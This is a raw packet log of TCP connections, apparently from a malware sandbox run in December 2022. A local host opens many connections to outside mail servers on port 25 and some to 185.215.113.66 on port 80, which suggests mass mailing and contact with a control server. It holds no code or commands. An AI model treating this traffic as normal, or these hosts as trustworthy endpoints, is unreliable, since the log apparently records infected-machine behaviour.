                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.643281937 CET2549810104.47.20.36192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.643712044 CET4981025192.168.2.3104.47.20.36
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.662965059 CET4977525192.168.2.3149.13.75.27
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.691591024 CET2549800203.134.71.81192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.697762012 CET2549810104.47.20.36192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.698096037 CET4981025192.168.2.3104.47.20.36
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.716527939 CET254980113.238.202.140192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.716566086 CET254980113.238.202.140192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.722515106 CET2549807203.134.71.81192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.723169088 CET4980725192.168.2.3203.134.71.81
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.723710060 CET4980125192.168.2.313.238.202.140
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.725980997 CET2549775149.13.75.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.730906963 CET2549810104.47.20.36192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.731112003 CET4981025192.168.2.3104.47.20.36
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.731774092 CET254980998.136.96.76192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.731888056 CET4980925192.168.2.398.136.96.76
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.755702019 CET254980827.86.106.73192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.755841970 CET4980825192.168.2.327.86.106.73
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.778532028 CET2549810104.47.20.36192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.778795958 CET4981025192.168.2.3104.47.20.36
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.788644075 CET254980667.195.228.94192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.788898945 CET4980625192.168.2.367.195.228.94
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.803659916 CET2549793104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.804094076 CET4979325192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.811573982 CET2549804203.36.137.234192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.811616898 CET2549804203.36.137.234192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.811687946 CET4980425192.168.2.3203.36.137.234
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.811846972 CET4980425192.168.2.3203.36.137.234
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.821749926 CET2549810104.47.20.36192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.821932077 CET4981025192.168.2.3104.47.20.36
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.832438946 CET254980374.125.200.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.833726883 CET4980325192.168.2.374.125.200.27
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.853663921 CET2549810104.47.20.36192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.855926037 CET2549810104.47.20.36192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.856508017 CET4981025192.168.2.3104.47.20.36
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.858423948 CET2549775149.13.75.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.860035896 CET2549775149.13.75.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.860107899 CET4977525192.168.2.3149.13.75.27
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.876290083 CET2549805209.41.68.146192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.878067970 CET2549802104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.898328066 CET4977525192.168.2.3149.13.75.27
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.899363041 CET4980525192.168.2.3209.41.68.146
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.899400949 CET4980225192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.920393944 CET2549775149.13.75.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.957638979 CET2549798203.36.172.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.957684040 CET2549797203.59.218.120192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.957704067 CET2549798203.36.172.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.957880020 CET4979825192.168.2.3203.36.172.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.957993031 CET4979825192.168.2.3203.36.172.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.960406065 CET4972125192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.963896990 CET254980667.195.228.94192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.963947058 CET254980667.195.228.94192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.964211941 CET4980625192.168.2.367.195.228.94
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.001941919 CET254980113.238.202.140192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.002000093 CET254980998.136.96.76192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.002151012 CET4980125192.168.2.313.238.202.140
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.002302885 CET4980925192.168.2.398.136.96.76
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.011017084 CET2549807203.134.71.81192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.011260986 CET4980725192.168.2.3203.134.71.81
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.011272907 CET2549807203.134.71.81192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.011322021 CET4980725192.168.2.3203.134.71.81
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.054014921 CET4981125192.168.2.323.90.107.55
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.058720112 CET2549805209.41.68.146192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.058769941 CET2549805209.41.68.146192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.058995962 CET4980525192.168.2.3209.41.68.146
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.064677000 CET4981225192.168.2.3203.36.172.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.065197945 CET4981325192.168.2.3203.36.172.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.086338997 CET2549793104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.087197065 CET2549793104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.087270021 CET4979325192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.108458996 CET254980827.86.106.73192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.113162994 CET4980825192.168.2.327.86.106.73
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.115015984 CET4977625192.168.2.3209.41.68.125
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.133239985 CET2549804203.36.137.234192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.133629084 CET4977625192.168.2.3209.41.68.125
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.135735989 CET4977625192.168.2.3209.41.68.125
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.136218071 CET4977625192.168.2.3209.41.68.125
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.137420893 CET4977625192.168.2.3209.41.68.125
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.137811899 CET4977625192.168.2.3209.41.68.125
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.138278961 CET4977625192.168.2.3209.41.68.125
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.138550043 CET4977625192.168.2.3209.41.68.125
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.138969898 CET4977625192.168.2.3209.41.68.125
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.139255047 CET4977625192.168.2.3209.41.68.125
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.139748096 CET254980667.195.228.94192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.139839888 CET254980667.195.228.94192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.139904022 CET4980625192.168.2.367.195.228.94
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.140341997 CET4980625192.168.2.367.195.228.94
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.142057896 CET254980998.136.96.76192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.142082930 CET254980998.136.96.76192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.144123077 CET4980925192.168.2.398.136.96.76
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.177362919 CET4981425192.168.2.398.136.96.91
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.179753065 CET2549802104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.180022001 CET4980225192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.181061983 CET4981525192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.205929041 CET254980374.125.200.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.207634926 CET4980325192.168.2.374.125.200.27
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.219209909 CET2549805209.41.68.146192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.219544888 CET4980525192.168.2.3209.41.68.146
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.266210079 CET2549721211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.271215916 CET4972125192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.275621891 CET2549807203.134.71.81192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.284544945 CET254980998.136.96.76192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.284589052 CET254980998.136.96.76192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.284687042 CET4980925192.168.2.398.136.96.76
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.284787893 CET4980925192.168.2.398.136.96.76
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.287638903 CET4981625192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.289869070 CET254980113.238.202.140192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.289906025 CET2549798203.36.172.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.290193081 CET4980125192.168.2.313.238.202.140
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.292749882 CET2549776209.41.68.125192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.295273066 CET2549776209.41.68.125192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.296761036 CET2549776209.41.68.125192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.297504902 CET2549776209.41.68.125192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.298228025 CET2549776209.41.68.125192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.310755014 CET2549776209.41.68.125192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.311003923 CET254981123.90.107.55192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.311114073 CET4981125192.168.2.323.90.107.55
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.311229944 CET4977625192.168.2.3209.41.68.125
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.311290979 CET4977625192.168.2.3209.41.68.125
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.315378904 CET254980667.195.228.94192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.319622993 CET254981498.136.96.91192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.319763899 CET4981425192.168.2.398.136.96.91
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.370867014 CET4981725192.168.2.3203.36.172.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.394583941 CET2549812203.36.172.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.394987106 CET2549813203.36.172.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.395127058 CET4981225192.168.2.3203.36.172.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.397973061 CET4981325192.168.2.3203.36.172.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.408529043 CET4981825192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.410377026 CET254980827.86.106.73192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.410408974 CET254980827.86.106.73192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.410723925 CET4980825192.168.2.327.86.106.73
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.419195890 CET2549805209.41.68.146192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.424649954 CET254980998.136.96.76192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.460335016 CET2549802104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.462780952 CET254981498.136.96.91192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.465313911 CET2549815104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.465897083 CET4981525192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.470546007 CET2549776209.41.68.125192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.470606089 CET4977625192.168.2.3209.41.68.125
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.494030952 CET4970680192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.495470047 CET4981980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.508800983 CET2549805209.41.68.146192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.539580107 CET4980225192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.539639950 CET4981425192.168.2.398.136.96.91
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.539777994 CET4980525192.168.2.3209.41.68.146
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.565782070 CET8049706185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.565898895 CET4970680192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.566724062 CET8049819185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.566899061 CET4981980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.568123102 CET254981123.90.107.55192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.568169117 CET254980113.238.202.140192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.568278074 CET4980125192.168.2.313.238.202.140
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.570688963 CET2549816104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.570806980 CET4981625192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.574568987 CET254980374.125.200.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.578159094 CET4981980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.653217077 CET8049819185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.653812885 CET8049819185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.653894901 CET4981980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.657234907 CET254981123.90.107.55192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.681822062 CET254981498.136.96.91192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.681857109 CET254981498.136.96.91192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.692594051 CET2549818104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.692717075 CET4981825192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.694065094 CET4981425192.168.2.398.136.96.91
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.699125051 CET2549805209.41.68.146192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.699590921 CET2549805209.41.68.146192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.703219891 CET2549817203.36.172.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.703363895 CET4981725192.168.2.3203.36.172.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.708698034 CET254980827.86.106.73192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.712177038 CET4980825192.168.2.327.86.106.73
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.741749048 CET4980525192.168.2.3209.41.68.146
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.745547056 CET254980374.125.200.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.745974064 CET4980325192.168.2.374.125.200.27
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.761177063 CET4982025192.168.2.367.195.204.73
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.794930935 CET4982125192.168.2.327.32.32.49
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.818837881 CET2549802104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.819636106 CET2549802104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.820075989 CET4980225192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.836791039 CET254981498.136.96.91192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.837059021 CET254981498.136.96.91192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.837102890 CET4981425192.168.2.398.136.96.91
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.837131977 CET4981425192.168.2.398.136.96.91
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.869632959 CET2549815104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.869983912 CET4981525192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.876511097 CET254982067.195.204.73192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.876616001 CET4982025192.168.2.367.195.204.73
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.957062006 CET4982225192.168.2.3202.22.162.67
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.974214077 CET2549816104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.974539042 CET4981625192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.977127075 CET2549765173.254.28.81192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.979155064 CET254981498.136.96.91192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.979470015 CET4976525192.168.2.3173.254.28.81
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:28.998812914 CET4982325192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.002954006 CET254982067.195.204.73192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.004338980 CET4982025192.168.2.367.195.204.73
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.011334896 CET254980827.86.106.73192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.011607885 CET4980825192.168.2.327.86.106.73
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.059670925 CET4982425192.168.2.367.195.228.110
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.093636990 CET2549818104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.094131947 CET4981825192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.112853050 CET254980374.125.200.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.119645119 CET254982067.195.204.73192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.119680882 CET254982067.195.204.73192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.120126963 CET4982025192.168.2.367.195.204.73
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.123454094 CET254982127.32.32.49192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.123641968 CET4982125192.168.2.327.32.32.49
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.150330067 CET2549765173.254.28.81192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.150895119 CET4976525192.168.2.3173.254.28.81
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.154120922 CET4982525192.168.2.367.195.204.74
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.154791117 CET4982625192.168.2.3203.36.172.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.154819012 CET2549815104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.155011892 CET4981525192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.187021017 CET2549812203.36.172.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.187052011 CET2549812203.36.172.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.187072992 CET2549813203.36.172.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.187089920 CET2549813203.36.172.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.187109947 CET2549817203.36.172.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.187125921 CET2549817203.36.172.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.187124014 CET4981225192.168.2.3203.36.172.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.187156916 CET4981325192.168.2.3203.36.172.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.187186956 CET4981725192.168.2.3203.36.172.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.187438965 CET4981225192.168.2.3203.36.172.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.187707901 CET4981325192.168.2.3203.36.172.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.187882900 CET4981725192.168.2.3203.36.172.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.234854937 CET254982467.195.228.110192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.235112906 CET4982425192.168.2.367.195.228.110
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.235867977 CET254982067.195.204.73192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.236042023 CET254982067.195.204.73192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.236150980 CET4982025192.168.2.367.195.204.73
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.236449003 CET4982025192.168.2.367.195.204.73
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.246320963 CET4982725192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.258208990 CET2549816104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.258609056 CET4981625192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.268193960 CET254982567.195.204.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.268335104 CET4982525192.168.2.367.195.204.74
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.281681061 CET254980374.125.200.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.281939983 CET4980325192.168.2.374.125.200.27
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.308933020 CET254980827.86.106.73192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.312705040 CET4982825192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.320053101 CET2549765173.254.28.81192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.320492029 CET4976525192.168.2.3173.254.28.81
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.345678091 CET4982925192.168.2.3203.18.20.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.351193905 CET4980825192.168.2.327.86.106.73
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.351703882 CET254982067.195.204.73192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.378917933 CET2549818104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.379189014 CET4981825192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.395689011 CET254982567.195.204.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.395884991 CET4982525192.168.2.367.195.204.74
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.440162897 CET2549815104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.440452099 CET4981525192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.452107906 CET254982127.32.32.49192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.452611923 CET4982125192.168.2.327.32.32.49
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.486931086 CET2549826203.36.172.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.488188028 CET4982625192.168.2.3203.36.172.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.509875059 CET254982567.195.204.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.509910107 CET254982567.195.204.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.510066032 CET4982525192.168.2.367.195.204.74
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.517179966 CET2549812203.36.172.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.517213106 CET2549813203.36.172.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.518150091 CET254982467.195.228.110192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.518815041 CET4982425192.168.2.367.195.228.110
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.520246029 CET2549817203.36.172.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.529747963 CET2549765173.254.28.81192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.542519093 CET2549816104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.544447899 CET4981625192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.567991972 CET4983025192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.596518993 CET2549828104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:29.596662998 CET4982825192.168.2.3104.47.71.202
